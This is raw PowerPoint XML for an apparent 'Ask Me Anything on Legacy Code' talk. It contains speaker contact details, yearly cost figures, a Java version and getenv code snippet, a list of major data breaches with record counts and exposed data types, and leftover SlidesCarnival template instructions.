          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="403964" y="19376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algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="300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23360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6137693" y="4103825"/>
            <a:ext cx="2475781" cy="103967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n w="3175">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:ln>
              </a:rPr>
              <a:t>Arlo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2400" dirty="0" err="1">
                <a:ln w="3175">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:ln>
              </a:rPr>
              <a:t>Belshee</a:t>
            </a:r>
            <a:endParaRPr sz="240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A2E74A-7318-1F05-40F5-6F580DBD6431}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="572007" y="449189"/>
            <a:ext cx="40776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Ask Me Anything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- on Legacy Code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D099AF-5CBA-EE42-2CC3-80513DFCB3BF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="406749" y="3752680"/>
            <a:ext cx="4077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Raleway"/>
                <a:sym typeface="Raleway"/>
              </a:rPr>
              <a:t>Thursday, May 26th</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Raleway"/>
                <a:sym typeface="Raleway"/>
              </a:rPr>
              <a:t>17:00-18:00 EST</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3" descr="A picture containing text, person, person, suit&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E127E84C-AAEB-081D-5BDE-AD683328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069" y="354184"/>
            <a:ext cx="3004182" cy="414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0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thanks!</a:t>
            </a:r>
            <a:endParaRPr sz="3000"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12556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ANY QUESTIONS?</a:t>
            </a:r>
            <a:endParaRPr sz="4800" b="1"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4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3833447" y="2623252"/>
            <a:ext cx="5025365" cy="20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You can find me at:</a:t>
            </a:r>
            <a:endParaRPr sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="r">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>@LlewellynFalco</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="r">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" dirty="0" err="1"/>
              <a:t>llewellynfalco.blogspot.com</a:t>
            </a:r>
            <a:endParaRPr lang="en" dirty="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 dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5" descr="llew.png">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EC0DF66E-DB76-6850-A635-C2B24E1E85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346953"/>
            <a:ext cx="1504406" cy="2119612"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="57150" cmpd="sng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5A980E-3F01-0F72-C9D2-BC6526633A7A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7438660" y="4929753"/>
            <a:ext cx="15969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solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>slides by slides carnival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D2451-5F80-3E1A-8DC5-FAF0C8EE68C2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6337738" y="218375"/>
            <a:ext cx="258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Please connect on </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"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LinkedIn &amp; Twitter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670050" y="4305300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03396648-72E4-3681-C287-A4D1AD273B40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$133</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="224225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7CF624-1957-E4FF-22AA-D47D44263CC4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4391890" y="2210443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50104B-C1DE-EB0D-3C6D-99444D7CAC8E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4391890" y="2610847"/>
            <a:ext cx="2501736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6CF098-A7CE-A59D-6BB7-D892EFEFCE91}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2315688" y="1427262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621504" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="000000">
              <a:alpha val="29020"/>
            </a:srgb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585BE-7AE9-CC15-5BB3-4E0FFBFAEFBA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="827398" y="3472917"/>
            <a:ext cx="7732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"%s"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, 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getenv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"java-version"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)));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C3158-9F00-512F-927B-30FD61AE74C6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="882650" y="2595890"/>
            <a:ext cx="6134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Java version 1.8.0_231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0082E5-C8E8-2280-1F6C-25553E6C5AE1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="882650" y="2210443"/>
            <a:ext cx="576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08558-61C3-D25F-2FA6-F28F6C7C8870}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="7" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="882650" y="2364331"/>
            <a:ext cx="5410200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CBAA67-7A37-48DD-15D4-6853DDF36522}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="20509399">
            <a:off x="5642758" y="550167"/>
            <a:ext cx="1282722" cy="30777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v2.0-beta9</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="53833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0" grpId="0"/>
      <p:bldP spid="6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957593" y="4288835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$465</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="113600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7CF624-1957-E4FF-22AA-D47D44263CC4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4391890" y="2210443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50104B-C1DE-EB0D-3C6D-99444D7CAC8E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4391890" y="2610847"/>
            <a:ext cx="2501736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6CF098-A7CE-A59D-6BB7-D892EFEFCE91}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2315688" y="1427262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621504" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="000000">
              <a:alpha val="29020"/>
            </a:srgb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585BE-7AE9-CC15-5BB3-4E0FFBFAEFBA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="827398" y="3472917"/>
            <a:ext cx="7732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"%s"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, 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getenv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"java-version"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)));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C3158-9F00-512F-927B-30FD61AE74C6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="882650" y="2595890"/>
            <a:ext cx="6134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Java version 1.8.0_231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0082E5-C8E8-2280-1F6C-25553E6C5AE1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="882650" y="2210443"/>
            <a:ext cx="576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08558-61C3-D25F-2FA6-F28F6C7C8870}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="7" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="882650" y="2364331"/>
            <a:ext cx="5410200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CBAA67-7A37-48DD-15D4-6853DDF36522}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="20509399">
            <a:off x="5642758" y="550167"/>
            <a:ext cx="1282722" cy="30777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v2.0-beta9</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="28608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0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2015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$239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7009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2016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0028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2017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$4,470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4078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2018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$6,622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8348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2019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$10,067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804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2020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$10,849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1582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$44,039</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="91024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89144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November 24</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" baseline="30000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> 2021</a:t>
            </a:r>
            <a:endParaRPr sz="2400" dirty="0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$57,382</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="422756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03800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4002360" y="279023"/>
            <a:ext cx="182880" cy="4608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5;p29">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BE032193-7E23-2A9C-8E89-EEE96C2E4E66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December 9</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" baseline="30000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> 2021 </a:t>
            </a:r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$50,470</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33" name="Google Shape;207;p29">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CC382457-4B72-F480-ADF5-F2EE1121AEA8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3210351" y="822053"/>
            <a:ext cx="1690084" cy="44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chemeClr val="bg1">
                    <a:lumMod val="85000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t> (16 days later )</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="250581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-2.77778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 flipV="1">
            <a:off x="1530529" y="2448372"/>
            <a:ext cx="182880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50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150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03396648-72E4-3681-C287-A4D1AD273B40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$133</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="427466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957593" y="4288835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$465</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="251960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7CF624-1957-E4FF-22AA-D47D44263CC4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4391890" y="2210443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50104B-C1DE-EB0D-3C6D-99444D7CAC8E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4391890" y="2610847"/>
            <a:ext cx="2501736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6CF098-A7CE-A59D-6BB7-D892EFEFCE91}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2315688" y="1427262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621504" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="000000">
              <a:alpha val="29020"/>
            </a:srgb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585BE-7AE9-CC15-5BB3-4E0FFBFAEFBA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="827398" y="3472917"/>
            <a:ext cx="7732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"%s"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, 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getenv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"java-version"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)));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C3158-9F00-512F-927B-30FD61AE74C6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="882650" y="2595890"/>
            <a:ext cx="6134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Java version 1.8.0_231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0082E5-C8E8-2280-1F6C-25553E6C5AE1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="882650" y="2210443"/>
            <a:ext cx="576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08558-61C3-D25F-2FA6-F28F6C7C8870}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="7" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="882650" y="2364331"/>
            <a:ext cx="5410200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CBAA67-7A37-48DD-15D4-6853DDF36522}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="20509399">
            <a:off x="5642758" y="550167"/>
            <a:ext cx="1282722" cy="30777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v2.0-beta9</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="231044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0" grpId="0"/>
      <p:bldP spid="6" grpId="0"/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October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152,000,000</a:t>
            </a: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2574D10-C0D5-3296-BF7C-8CB9F5977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40" b="25035"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3006189" y="811439"/>
            <a:ext cx="3131371" cy="867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4C63DE-214F-C8EC-4A3B-762EE7935268}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6699597" y="778144"/>
            <a:ext cx="13500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Username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 hint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9885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56,000,000</a:t>
            </a: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062A79A-7CC8-526E-EC85-9327E7FB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679" y="817346"/>
            <a:ext cx="875205" cy="87520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49897E7-E12F-ECA4-DBFD-23B589BDB4F8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6699597" y="778144"/>
            <a:ext cx="1486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Credit Card info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079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July 2015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32,000,000</a:t>
            </a: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624CFF1-37F4-F072-759C-0F1548E46C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3049014" y="781873"/>
            <a:ext cx="3156731" cy="92662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1F1EC14-021C-AB5C-CE8E-D942666C8E9C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6699597" y="778144"/>
            <a:ext cx="202651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Credit card payments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Full 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Residential Addresses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Seeking Descriptions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2681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2016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57,000,000</a:t>
            </a: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81011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Driver’s License</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Raleway" pitchFamily="2" charset="77"/>
            </a:endParaRP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Ubers </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Raleway" pitchFamily="2" charset="77"/>
              </a:rPr>
              <a:t>Github</a:t>
            </a:r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/AWS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4903411-8C25-CB1B-A02C-22FBB7A65B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59" b="15175"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3282192" y="729006"/>
            <a:ext cx="2437005" cy="9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779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2017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148,000,000</a:t>
            </a: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54080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Address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Birthdays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SSN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Drivers Licenses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0E93F73-1108-3D07-90EA-F8D8B737F4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41" b="29610"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2944870" y="898580"/>
            <a:ext cx="3489796" cy="69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335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March May December 2018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435,000,000</a:t>
            </a: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215796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Birthdays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Airline loyalty programs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1FF5359-8128-C1AE-FABB-275EE41E2E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645" y="964763"/>
            <a:ext cx="1305356" cy="65267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D200904-0D14-BAF8-2563-743C3071C8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1177" y="811439"/>
            <a:ext cx="1655675" cy="93131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8DF1E5-67FB-4D74-A39E-E8800160D1C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084" t="12245" r="19712" b="16576"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3968093" y="715506"/>
            <a:ext cx="942844" cy="107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621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April 2019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533,000,000</a:t>
            </a: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730911" y="903306"/>
            <a:ext cx="1334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146 gigabytes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9FBCECD-18F8-1FC2-D954-FB10789573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947" b="28321"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2805584" y="829597"/>
            <a:ext cx="3707592" cy="7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73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March 2020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10,880,000,000</a:t>
            </a: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2496196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Full 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Sexual Orientation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Correspondence transcripts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Payment logs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Ip addresses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 hashes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7CF4C91-CFAC-A4E8-3CEB-B1C04CAA3F4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5519" b="28729"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3268970" y="874394"/>
            <a:ext cx="2946890" cy="674137"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="43" name="Google Shape;311;p37">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BDAD0215-9F34-ECBF-8B0E-52B488D883D4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7690143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June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700,000,000</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="Google Shape;301;p37">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D0000AD3-6BD8-39D3-45F2-946B620F9AB8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5633735" y="3582093"/>
            <a:ext cx="1942839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2021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71754AD-E921-9D55-B985-913518C5465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273" b="24687"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5806339" y="2478457"/>
            <a:ext cx="798815" cy="203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27470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Geolocations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Google Shape;311;p37">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D1ECAC1B-7A42-E9F9-4642-1EFA36400241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1AB5411-A1FE-7348-E588-AA4F733F1E2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273" b="24687"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3317285" y="906115"/>
            <a:ext cx="2620052" cy="6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38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2015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$239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5952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4,800,000</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="Google Shape;301;p37">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D0000AD3-6BD8-39D3-45F2-946B620F9AB8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5633735" y="3582093"/>
            <a:ext cx="1942839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2021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718740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Usernames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Security questions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Financial info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Virtual gift cards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Google Shape;311;p37">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D1ECAC1B-7A42-E9F9-4642-1EFA36400241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1EBC81F5-9231-B980-41D4-31BE3AE0353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4585" b="14255"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3177019" y="768959"/>
            <a:ext cx="2661677" cy="9470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5DD1016-A8EF-E449-E6D9-3A8A80D5F4B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4585" b="14255"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5767263" y="3068554"/>
            <a:ext cx="898838" cy="31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277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October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7,000,000</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="Google Shape;301;p37">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D0000AD3-6BD8-39D3-45F2-946B620F9AB8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5633735" y="3582093"/>
            <a:ext cx="1942839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2021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6914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Source code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Payout reports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Twitch’s internal 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    security training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Google Shape;311;p37">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D1ECAC1B-7A42-E9F9-4642-1EFA36400241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4779010-28E1-C982-6A94-E0C71E0EFC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658" y="730626"/>
            <a:ext cx="2049635" cy="10248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B1300A-30B7-56A6-FE29-DE370EE723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7237" y="2985843"/>
            <a:ext cx="970457" cy="48522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97C53E6-D516-F153-F69F-87ACFC6CDE2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4585" b="14255"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5767263" y="3068554"/>
            <a:ext cx="898838" cy="31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520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</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="54" name="Google Shape;54;p12"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1107413"/>
            <a:ext cx="3776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 IN GOOGLE SLIDES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Click on the button under the presentation preview that says "Use as Google Slides Theme".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will get a copy of this document on your Google Drive and will be able to edit, add or delete slides.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have to be signed in to your Google account.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4744975" y="1107413"/>
            <a:ext cx="3941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 IN POWERPOINT®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Click on the button under the presentation preview that says "Download as PowerPoint template". You will get a .pptx file that you can edit in PowerPoint. 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Remember to download and install the fonts used in this presentation (you’ll find the links to the font files needed in the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2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="3577144"/>
            <a:ext cx="8229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More info on how to use this template at </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200" b="1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template is free to use under </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200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You can keep the Credits slide or mention SlidesCarnival and other resources used in a slide footer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ctrTitle" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="172239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big concept</a:t>
            </a:r>
            <a:endParaRPr sz="4800"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294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2138400" y="2782913"/>
            <a:ext cx="4867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Bring the attention of your audience over a key concept using icons or illustrations</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="92" name="Google Shape;92;p17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2534100" y="1243675"/>
            <a:ext cx="3965346" cy="2559450"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="217966" h="136504" extrusionOk="0">
                <a:moveTo>
                  <a:pt x="134084" y="36957"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="111060" y="41754"/>
                  <a:pt x="71532" y="43758"/>
                  <a:pt x="65342" y="21069"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="63408" y="13980"/>
                  <a:pt x="68316" y="4183"/>
                  <a:pt x="75070" y="1289"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="79540" y="-627"/>
                  <a:pt x="85016" y="-152"/>
                  <a:pt x="89661" y="1289"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="97022" y="3573"/>
                  <a:pt x="100737" y="15340"/>
                  <a:pt x="98416" y="22690"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="92031" y="42904"/>
